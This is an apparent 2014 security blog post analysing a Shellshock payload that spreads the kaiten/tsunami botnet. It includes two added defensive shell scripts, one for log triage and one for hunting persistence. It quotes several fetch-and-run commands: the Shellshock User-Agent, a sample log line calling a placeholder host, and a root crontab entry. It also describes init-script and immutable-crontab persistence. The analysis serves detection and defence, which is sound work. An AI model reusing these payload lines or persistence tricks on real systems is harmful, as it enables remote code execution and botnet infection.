Monday, October 6, 2014

Interesting Shellshock payload being used to spread "kaiten" botnet


This blog post brought to you in part by: MalwareMustDie. I must thank them for their assistance on this one.

Today I came in and found around 300+ Shellshock payloads. As I groggily looked through most of them, noting the same old vulnerability probes and payloads already documented in Project OverWatch, one alert caught my eye:
GET /nodeworx/ HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "curl -o /tmp/.a;fetch -o /tmp/.a;wget -O /tmp/.a;sh /tmp/.a;rm -rf /tmp/.a"
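The request above is the shape every Shellshock probe takes: a `() {` function definition in a header that the CGI layer exports into bash's environment, followed by the commands the attacker actually wants run. Here is an added example, not code from the original post, of a POSIX shell triage script that pulls such probes out of a combined-format access log and reduces each one to the injected command and its download URLs. The log lines embedded in it are constructed (documentation-range client IPs, a placeholder download host), and it assumes the payload sits in the last quoted field, the User-Agent, as it does here.

```shell
#!/bin/sh
# Added example, not from the original post: triage a web server access
# log (combined format) for Shellshock probes and pull out the command
# each one tried to run. Usage: sh shellshock_triage.sh access.log
# With no argument it runs against the constructed sample log below.

# Constructed sample: documentation-range client IPs, a placeholder
# download host, and one benign request that must not match.
sample_log() {
    cat <<'EOF'
203.0.113.5 - - [06/Oct/2014:09:12:33 -0400] "GET /nodeworx/ HTTP/1.0" 404 212 "-" "() { :;}; /bin/bash -c \"wget -O /tmp/.a http://example.invalid/a;sh /tmp/.a;rm -rf /tmp/.a\""
198.51.100.7 - - [06/Oct/2014:09:14:02 -0400] "GET /cgi-bin/test.cgi HTTP/1.1" 200 318 "-" "() { :; }; /usr/bin/id"
192.0.2.44 - - [06/Oct/2014:09:15:40 -0400] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
EOF
}

# Print every log line carrying a bash function definition "() {".
# That marker is the one thing every Shellshock payload has to contain,
# whatever header (User-Agent, Referer, Cookie, ...) it arrives in.
shellshock_hits() {
    grep -E '\(\)[[:space:]]*[{]' "$1"
}

# Number of probe lines in the log file $1 ("0" when there are none).
hit_count() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

# Reduce one hit ($1) to the injected command: drop everything through
# the "};" that closes the function body, unescape the log's \" quoting
# and strip the quote that closes the header field. Assumes the payload
# sits in the last quoted field (User-Agent), as in the sample.
injected_command() {
    printf '%s\n' "$1" | sed -E \
        -e 's/.*\(\)[[:space:]]*[{][^}]*[}];?[[:space:]]*//' \
        -e 's/\\"/"/g' \
        -e 's/"$//'
}

# URLs the injected command downloads from: the IOCs to block and to
# fetch for analysis. Prints nothing when the command has none.
download_urls() {
    injected_command "$1" | grep -oE 'https?://[^ ;"]+' | sort -u
}

# Run as a script: report each probe with its command and download URLs.
if [ "$#" -gt 0 ] && [ -f "$1" ]; then
    log=$1
else
    log=$(mktemp)
    sample_log > "$log"
    trap 'rm -f "$log"' EXIT
fi
printf '%s Shellshock probe(s) in %s\n' "$(hit_count "$log")" "$log"
shellshock_hits "$log" | while IFS= read -r line; do
    printf '  cmd: %s\n' "$(injected_command "$line")"
    download_urls "$line" | sed 's/^/  url: /'
done
```

The `() {` marker is deliberately matched anywhere in the line rather than only in the User-Agent, because the same payload was being sent in Referer, Cookie and custom headers; only the command extraction assumes the field position.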

Awesome. A new toy to play with. Note the three downloaders in a row: curl, fetch (the FreeBSD downloader) and wget are all tried against the same /tmp/.a so that whichever one the host happens to have fetches the script before it is run and deleted. Let's pull down the payload:


Looks like it's a shell script. Reading through it reveals the following:

1) attempts to install gcc and php (via both yum and apt-get, presumably to cover as many Linux distros as possible)

2) adds a nameserver to resolv.conf: a Level 3 Communications public DNS server, one of the most widely used resolvers worldwide, presumably to make sure the download hostnames resolve even on a host with broken DNS

3) appends a "wget" line to either /etc/rc.d/init.d/sshd or /etc/init.d/ssh, so the download runs whenever the SSH init script is invoked

-- the file that line fetches is a persistence script. It instructs the machine to download the bot source, a.c, compile it into a binary in /tmp, execute it and delete it. That re-establishes the bot on every run, and if the source is changed (say, to point at a new CnC), the bot is updated along with it.

4) several pre-compiled builds of the same bot, for different platforms, are downloaded and execution of each is attempted. Additionally, the source file a.c is downloaded by this script, compiled, and executed

5) to further enable persistence, this line is added to root's crontab:
@weekly wget -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

Just like the lines appended to the ssh and sshd init scripts, this is a persistence mechanism. What's interesting is this line:

chattr +isa /var/spool/cron/tabs/root
+i makes the file immutable: it cannot be modified, renamed, linked or deleted, not even by root, until the flag is cleared, and only a process with CAP_LINUX_IMMUTABLE (in practice, root) can set or clear it. This is a common persistence trick among penetration testers too. Because chattr (change attribute) is so rarely used, most people won't think to look for it or know how to undo it. Tip: lsattr lists the attributes on a file, and chattr -ia clears them so the crontab can be removed.
+s requests secure deletion (zeroing the file's blocks when it is deleted), but the mainline ext2/ext3/ext4 implementations do not honor it, so on most hosts it does nothing.
+a makes the file append-only: it can be opened for writing only in append mode, so existing entries cannot be overwritten or truncated. Combined with +i it adds nothing, since the immutable flag already blocks every write.

6) finally, a cron.weekly entry named "00logrotate" is created that performs the same actions as the weekly root crontab entry, and gets the same chattr +isa treatment.
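The six steps above amount to a checklist for a compromised host. Here is an added example, not code from the original post, that turns it into a POSIX shell hunt: it looks for download commands in the init scripts and cron entries the dropper touches, and for the immutable/append-only attributes on them. The two init-script paths and /var/spool/cron/tabs/root are the ones named above; the other two root-crontab locations are assumed alternatives for RHEL- and Debian-style hosts. The fixture trees in the usage note are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: hunt for the persistence
# artifacts described above. Scans the live host, or a mounted image or
# fixture tree, rooted at the directory given as $1.
# Usage: sh hunt_kaiten.sh /        (live host, run as root)
#        sh hunt_kaiten.sh /mnt/img  (offline disk)

# Init scripts the dropper appends to (paths relative to ROOT).
INIT_FILES="etc/rc.d/init.d/sshd etc/init.d/ssh"
# Root crontab as named in the post, plus the usual RHEL and Debian
# locations (assumed alternatives), and the cron.weekly entry.
CRON_FILES="var/spool/cron/tabs/root var/spool/cron/root var/spool/cron/crontabs/root etc/cron.weekly/00logrotate"

# Print "LINE:text" for every non-comment line in $1 that runs wget,
# curl or fetch. An sshd init script or root crontab has no business
# downloading anything, so any hit is worth a look. Returns 1 if none.
download_lines() {
    [ -f "$1" ] || return 1
    grep -nE '(^|[;&| ])(wget|curl|fetch)([[:space:]]|$)' "$1" \
        | grep -vE '^[0-9]+:[[:space:]]*#' || return 1
}

# Print the attribute string of $1 when it carries the immutable (i) or
# append-only (a) flag. Returns 1 otherwise, or when lsattr (e2fsprogs)
# is missing or the filesystem does not support attributes.
locked_attrs() {
    [ -f "$1" ] || return 1
    command -v lsattr >/dev/null 2>&1 || return 1
    attrs=$(lsattr -d "$1" 2>/dev/null | cut -d' ' -f1)
    case "$attrs" in
        *i*|*a*) printf '%s\n' "$attrs"; return 0 ;;
    esac
    return 1
}

# Check every path above under ROOT ($1, default /). Returns 0 when
# nothing was found and 1 when at least one indicator was found.
check_host() {
    root=${1:-/}
    root=${root%/}
    found=0
    for rel in $INIT_FILES; do
        if hits=$(download_lines "$root/$rel"); then
            printf '[!] download in init script %s/%s\n%s\n' "$root" "$rel" "$hits"
            found=1
        fi
    done
    for rel in $CRON_FILES; do
        if hits=$(download_lines "$root/$rel"); then
            printf '[!] download in cron entry %s/%s\n%s\n' "$root" "$rel" "$hits"
            found=1
        fi
        if attrs=$(locked_attrs "$root/$rel"); then
            printf '[!] %s/%s has attributes %s (clear with: chattr -ia)\n' "$root" "$rel" "$attrs"
            found=1
        fi
    done
    # Nameservers are listed for review, not judged: a newly added public
    # resolver is only suspicious in context.
    if [ -f "$root/etc/resolv.conf" ]; then
        grep -n '^nameserver' "$root/etc/resolv.conf" || true
    fi
    return $found
}

# Run as a script: scan the root given on the command line.
if [ "$#" -gt 0 ]; then
    check_host "$1"
fi
```

Point it at a mounted image rather than the live host when you can: on the live host the cron files are readable only by root, and an immutable crontab will refuse `crontab -r` until `chattr -ia` has been run on it. The nameserver lines are printed rather than scored because the IP the dropper adds is a legitimate public resolver; it is only the fact that something added it that matters.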

What gets me is that these actors go to such lengths for persistence, but then completely fail to protect the source code for their bot (zero obfuscation), fail to link it statically in case the required libraries are not on the target, and so on. Their loss is our gain.

Here are some links for the curious:

wget <-- main script
wget <-- persistence script
wget <-- kaiten bot source code
wget <-- x86_64 compilation
wget <-- ARM compilation
wget <-- MIPS compilation
wget <-- see below.. this one is fun.
wget <-- see below.. more fun!

I submitted the sha1sum of the file "b" to VirusTotal to see if it had already been uploaded. Looks like someone beat me to the punch by a few hours:

VT identifies this bot as kaiten/tsunami, no doubt in reference to the source code and/or the "tsunami" DDoS attack the bot can perform.

The ARM/MIPS variants were a bit of a concern to me. This is one of the few times outside of the Zollard botnet that I've seen a bot precompiled for other CPU architectures, ARM and MIPS in this case.

It is worrying because, while Shellshock has been patched on the major platforms, embedded and SOHO devices that ship a bash shell remain vulnerable and in most cases will likely stay that way indefinitely.

I decided to consult MMD on this case, as I recall hearing about Tsunami/Kaiten from them a while ago. It appears this is commonplace for the kaiten botnet: the source code is shipped so the bot can be compiled on any platform. They also made me aware of additional payloads the bot can deliver for spreading deeper into targeted networks:

The dh file above is a variant of the Shellshock-over-DHCP exploit that has already been seen from TrustedSec as a Perl module. Loaded onto a SOHO device or router inside a target network, it opens a much wider avenue for exploitation and for pivoting deeper into that network... if the device has a Python interpreter.

The tmp.gz file is actually a tar.gz. It contains pnscan, a port scanner commonly packaged with DDoS bots, and bash.php, a PHP script carrying the initial exploit payload that is delivered via Shellshock. If you want the payload, grab it now; I'm following up with the provider for that IP address to get it remediated as soon as possible.

The C source mentions a server that I'm fairly certain is, or was, the botnet CnC. I couldn't connect to it via irssi; I may need to detonate the bot later to confirm.

Happy Hunting,


1 comment:

  1. This technical post helps me improve my skill set; thanks for this wonderful article. I look forward to your upcoming blog, so keep sharing..
    PHP Training Institute in Chennai